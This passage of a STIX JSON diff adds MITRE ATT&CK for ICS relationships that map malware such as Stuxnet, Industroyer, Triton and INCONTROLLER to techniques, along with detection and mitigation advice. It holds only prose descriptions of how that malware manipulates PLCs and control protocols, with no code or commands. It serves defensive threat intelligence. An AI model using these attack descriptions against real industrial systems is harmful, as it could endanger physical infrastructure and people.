Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--62e818b8-38e6-42ff-9424-9a327332eb2a", + "created": "2022-09-29T20:02:37.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T15:22:56.606Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) IEC 61850 component sends the domain-specific MMSgetNameList request to determine what logical nodes the device supports. 
It then searches the logical nodes for the CSW value, which indicates the device performs a circuit breaker or switch control function.(Citation: ESET Industroyer)\n\n[Industroyer](https://attack.mitre.org/software/S0604)'s OPC DA module also uses IOPCBrowseServerAddressSpace to look for items with the following strings: ctlSelOn, ctlOperOn, ctlSelOff, ctlOperOff, Pos and stVal.(Citation: ESET Industroyer)\n\n[Industroyer](https://attack.mitre.org/software/S0604) IEC 60870-5-104 module includes a range mode to discover Information Object Addresses (IOAs) by enumerating through each.(Citation: ESET Industroyer)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e275c19-7688-47f8-8cd5-85eaacec465b", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:34:04.450Z", + "description": "Monitor industrial process history data for events that correspond with command message functions, such as setpoint modification or changes to system status for key devices. 
This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:09:52.454Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) renames s7otbxdx.dll, a dll responsible for handling communications with a PLC. It replaces this dll file with its own version that allows it to intercept any calls that are made to access the PLC. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1ed4d007-6d30-4d5d-8df9-3800ed56e042", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:46:37.894Z", + "description": "Analyze network data for uncommon data flows (e.g., new protocols in use between hosts, unexpected ports in use). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--79324bdd-cdab-4d0a-af60-af1047c1d117", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:25:35.287Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. 
The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3be9d4d1-17e1-4f3e-b22a-edad8cf0c343", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.216Z", + "relationship_type": "mitigates", + "description": "Devices should verify that firmware has been properly signed by the vendor before allowing installation.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--25e7ca82-2784-433a-90a9-a3483615a655", + "type": "relationship", + "created": "2019-04-12T17:01:01.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. 
Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "source_name": "FireEye APT38 Oct 2018" + }, + { + "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/", + "source_name": "LogRhythm WannaCry" + }, + { + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "source_name": "FireEye WannaCry 2017" + }, + { + "source_name": "SecureWorks WannaCry Analysis", + "url": "https://www.secureworks.com/research/wcry-ransomware-analysis", + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019." + } + ], + "modified": "2019-09-09T19:15:45.677Z", + "description": "(Citation: FireEye APT38 Oct 2018)(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4966e63c-ca05-466d-91f9-41d799a54471", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.186Z", + "relationship_type": "mitigates", + "description": "Provide privileges corresponding to the restriction of a GUI session to control system operations (examples include HMI read-only vs. read-write modes). 
Ensure local users, such as operators and engineers, are giving prioritization over remote sessions and have the authority to regain control over a remote session if needed. Prevent remote access sessions (e.g., RDP, VNC) from taking over local sessions, especially those used for ICS control, especially HMIs.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--18ef2d69-d11a-4d31-a803-da989c4073f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.096Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--709c4e40-c5c6-405b-bc3d-0adfea40ccd4", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:25:44.864Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) communicates with Triconex controllers using a custom component framework written entirely in Python. The modules that implement the TriStation communication protocol and other supporting components are found in a separate file -- library.zip -- the main script that employs this functionality is compiled into a standalone py2exe Windows executable -- trilog.exe which includes a Python environment. 
(Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65adbdda-7069-40ed-9825-b79ec87e4916", + "type": "relationship", + "created": "2021-09-21T15:47:37.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "IBM Ransomware Trends September 2020", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021." + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021." + }, + { + "source_name": "FBI Flash FIN7 USB", + "url": "https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/", + "description": "The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022." 
+ } + ], + "modified": "2022-01-14T17:29:16.633Z", + "description": "(Citation: IBM Ransomware Trends September 2020)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)", + "relationship_type": "uses", + "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "target_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ad7fd147-066e-4ed5-aa9d-7b2f1771150d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.111Z", + "relationship_type": "mitigates", + "description": "Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application. (Citation: Karen Scarfone; Paul Hoffman September 2009)\n", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 
2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--baf7daf3-2116-4051-91b5-f82e146167d0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.235Z", + "relationship_type": "mitigates", + "description": "Routinely audit source code, application configuration files, open repositories, and public cloud storage for insecure use and storage of credentials.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0d4f2f88-e176-42c7-8258-52b345045662", + "created": "2022-09-28T20:29:51.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. 
Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:08.493Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely send commands to a malicious agent uploaded on Omron PLCs over HTTP or HTTPS.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--698d7c50-daab-4087-a7b4-b2bc8dfd81a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.154Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 
2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8f76d408-be8a-478e-8a5a-aab1d1f96572", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:20:08.002Z", + "description": "Using OPC, a component of [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) gathers any details about connected devices and sends them back to the C2 for the attackers to analyze. (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3a6cd53d-0d4e-4cf8-8edf-f9ebde4faac4", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:23:59.758Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. 
The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:14.825Z", + "description": "Monitor for network traffic originating from unknown/unexpected hosts. 
Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f145b7e5-048b-46e7-8439-e2b88917523c", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:48:47.595Z", + "description": "Monitor alarms for information about when an operating mode is changed, although not all devices produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e3923fcf-5580-4c1e-bc55-33f67792cc00", + "created": "2022-09-28T20:25:51.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. 
Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.448Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can wipe the memory of Omron PLCs and reset settings through the remote HTTP service.(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1acccbe8-64e1-49ad-87df-215d5c87f050", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:42:43.105Z", + 
"description": "Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:30.761Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) ransomware spreads through drive-by attacks where insecure websites are compromised. While the target is visiting a legitimate website, a malware dropper is being downloaded from the threat actors infrastructure. 
(Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2fd13fc0-e3f0-4099-ab20-d19ba6bcd4e0", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:11:26.196Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) examines fields recorded by the DP_RECV monitor to determine if the target system is in a particular state of operation. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3d20dad6-fb53-4d74-bc7e-54b9b88e1529", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:41:15.273Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). 
